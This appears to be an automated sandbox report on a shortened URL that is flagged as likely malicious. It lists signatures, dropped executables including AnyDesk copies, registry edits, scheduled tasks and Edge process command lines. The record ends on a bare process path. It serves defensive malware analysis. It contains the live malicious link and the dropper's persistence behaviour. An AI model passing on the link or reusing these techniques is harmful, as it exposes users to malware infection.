Analysis Overview
Threat Level: Likely malicious
The file http://rb.gy/g44izl was found to be: Likely malicious.
Malicious Activity Summary
Disables Task Manager via registry modification
Possible privilege escalation attempt
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Modifies file permissions
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Checks installed software on the system
Drops file in System32 directory
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Modifies registry key
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Scheduled Task/Job: Scheduled Task
Delays execution with timeout.exe
Uses Task Scheduler COM API
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Modifies data under HKEY_USERS
Views/modifies file attributes
Modifies registry class
NTFS ADS
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Analysis: static1
Detonation Overview
Reported: 2024-10-04 03:16
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-10-04 03:16
Reported: 2024-10-04 03:24
Platform: win10v2004-20240802-en
Max time kernel: 475s
Max time network: 475s
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Possible privilege escalation attempt
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\ProgramData\stn.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\stn.exe | N/A |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Modifies file permissions
Checks installed software on the system
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db | C:\ProgramData\Anydesk.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Anydesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Anydesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\AnyDesk.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Anydesk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Anydesk.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\ProgramData\Anydesk.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2412658365-3084825385-3340777666-1000\{B27B3CB8-01DD-4B4E-B437-D87785F51D84} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 199374.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://rb.gy/g44izl
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cc5346f8,0x7ff9cc534708,0x7ff9cc534718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5248 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3476 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=3544 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4104 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5492 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
